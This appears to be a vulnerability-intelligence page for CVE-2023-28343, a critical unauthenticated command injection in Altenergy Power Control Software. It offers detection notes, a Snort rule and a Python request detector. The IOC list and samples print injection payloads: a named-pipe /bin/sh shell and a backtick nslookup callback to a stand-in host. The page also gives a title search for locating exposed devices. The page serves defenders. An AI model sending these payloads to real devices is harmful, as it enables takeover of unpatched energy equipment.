CVE-2023-28343
published 2023-03-14


Priority: P1 (91) · critical 9.8 · CVSS 3.1
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.33% (99.7th percentile)
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.

Affected (1 range)

Vendor: apsystems
Product: energy_communication_unit_firmware
Version range: (none listed)
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

url: /index.php/management/set_timezone
path: /index.php/management/set_timezone
command: timezone=`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe …/tmp/pipe`
command: timezone=`nslookup {{interactsh-url}}`
snort:
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_29, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • The exploit sends an HTTP POST to /index.php/management/set_timezone with shell metacharacters (backtick, $, ;) in the 'timezone' body parameter. Look for both the raw characters and their URL-encoded forms: %60 (backtick), %24 ($), %3B (;). Note that the Snort rule above matches only the percent-encoded forms in its pcre, so a client that sends the backtick unencoded (curl's --data does so by default) is not covered by it. The rule's msg and metadata cve tag also cite CVE-2022-25237 while its reference keywords point to CVE-2023-28343, so track it by sid 2044825 rather than by the message text.
  • The exploit sets specific HTTP headers: X-Requested-With: XMLHttpRequest and Content-Type: application/x-www-form-urlencoded; charset=UTF-8, with Referer set to /index.php/management/datetime. The combination of these with a POST to set_timezone is a strong signal, but their absence does not clear a request: they are what the published PoC sends, and a modified exploit can omit them.
  • Successful exploitation returns HTTP 200 with a body containing 'Time Zone updated successfully' and Content-Type text/html. The same response is returned for a legitimate timezone change, so on its own it is not an indicator; monitor for it following a suspicious timezone POST, where it confirms the injected value reached the handler.
  • Shodan/FOFA exposure: devices whose page title is 'Altenergy Power Control Software' are the target surface. A title search for that string identifies exposed assets.
  • The published exploit creates a named pipe at /tmp/pipe and spawns /bin/sh. Monitor for mknod calls creating FIFOs in /tmp and for shells spawned by the web server process.
  • DNS interaction (OOB) via nslookup is used for blind confirmation of the injection. Outbound DNS queries originating from the web server process are an indicator of successful exploitation.
  • APSystems has not responded to CISA mitigation requests, and no vendor patch is confirmed available. Detection and network isolation are the primary defensive options.
  • The vulnerability requires no authentication (PR:N, UI:N), so any network-reachable instance is exploitable without credentials.
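As an added example (not code from this page, the PoC repository, or the vendor), the following Python detector implements the request-side checks from the Snort rule and the notes above over constructed sample requests. The hostnames, sample traffic and function names are assumptions made for the example. It decodes the form body before inspecting it, so raw and percent-encoded metacharacters are treated alike, which closes the gap in the quoted rule's pcre, and it uses the PoC headers only to raise confidence rather than to gate the match.

```python
"""Flag CVE-2023-28343 exploitation attempts in captured HTTP requests.

Added example, not code from the page, the PoC repository or the vendor.
All requests, hostnames and the response below are constructed samples.
"""
import re
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import unquote

TARGET_PATH = "/index.php/management/set_timezone"
# Characters that let the value break out of the shell command built by
# set_timezone: backtick, $, ;, |, &, newline. A raw & cannot reach the
# handler inside a form value, but %26 decodes to one.
SHELL_META = re.compile(r"[`$;|&\n]")
# Headers the published PoC sends. Presence raises confidence; absence does
# not clear a request, since a modified exploit can omit them.
POC_HEADERS = {
    "x-requested-with": "xmlhttprequest",
    "referer": "/index.php/management/datetime",
}
SUCCESS_MARKER = b"Time Zone updated successfully"


class Request(NamedTuple):
    method: str
    path: str
    headers: Dict[str, str]
    body: bytes


def parse_request(raw: bytes) -> Request:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return Request(method.decode("latin-1"), path.decode("latin-1"), headers, body)


def form_values(body: bytes, name: str) -> List[str]:
    """Return the decoded values of form field `name` from a urlencoded body.

    Decoded by hand rather than with parse_qs so that ';' is never treated as
    a pair separator (older Pythons did), which would split the named-pipe
    PoC from the IOC list into two fields and hide half of the payload.
    """
    values = []
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        if unquote(key.replace("+", " ")) == name:
            values.append(unquote(value.replace("+", " ")))
    return values


def analyze(raw: bytes) -> Optional[Dict[str, object]]:
    """Return a finding for an exploitation attempt, or None for benign traffic."""
    req = parse_request(raw)
    if req.method != "POST" or not req.path.endswith(TARGET_PATH):
        return None
    hits = [v for v in form_values(req.body, "timezone") if SHELL_META.search(v)]
    if not hits:
        return None
    header_match = all(
        req.headers.get(name, "").lower().endswith(value)
        for name, value in POC_HEADERS.items()
    )
    return {
        "path": req.path,
        "payload": hits[0],
        "confidence": "high" if header_match else "medium",
        # The blind variant confirms execution through an outbound DNS lookup.
        "oob_dns": "nslookup" in hits[0],
    }


def is_success_response(raw: bytes) -> bool:
    """True when the server reports the timezone as updated (HTTP 200 + marker).

    The same body is returned for legitimate updates, so this only confirms
    that a suspicious request reached the handler; pair it with analyze().
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n")[0]
    return status_line.startswith(b"HTTP/1.") and b" 200 " in status_line and SUCCESS_MARKER in body


# Constructed sample traffic, not captures. oob.example stands in for an OOB DNS callback host.
SAMPLES = {
    "poc_oob": (
        b"POST /index.php/management/set_timezone HTTP/1.1\r\n"
        b"Host: ecu.example\r\n"
        b"X-Requested-With: XMLHttpRequest\r\n"
        b"Referer: http://ecu.example/index.php/management/datetime\r\n"
        b"Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
        b"\r\n"
        b"timezone=`nslookup oob.example`"
    ),
    "encoded_no_headers": (
        b"POST /index.php/management/set_timezone HTTP/1.1\r\n"
        b"Host: ecu.example\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"\r\n"
        b"timezone=%60id%60"
    ),
    "benign": (
        b"POST /index.php/management/set_timezone HTTP/1.1\r\n"
        b"Host: ecu.example\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"\r\n"
        b"timezone=Europe%2FBerlin"
    ),
    "wrong_method": (
        b"GET /index.php/management/set_timezone?timezone=%60id%60 HTTP/1.1\r\n"
        b"Host: ecu.example\r\n"
        b"\r\n"
    ),
}
SAMPLE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\nTime Zone updated successfully"

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label}: {analyze(raw)}")
    print("success response:", is_success_response(SAMPLE_RESPONSE))
```

Feed it reassembled request bodies from a proxy log or a pcap; it ignores GETs because the injection point is the POST body, and it flags the percent-encoded case at medium confidence precisely because the PoC headers are missing, which is what the quoted rule's `confidence High` metadata would otherwise miss.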

CVSS provenance

NVD: v3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL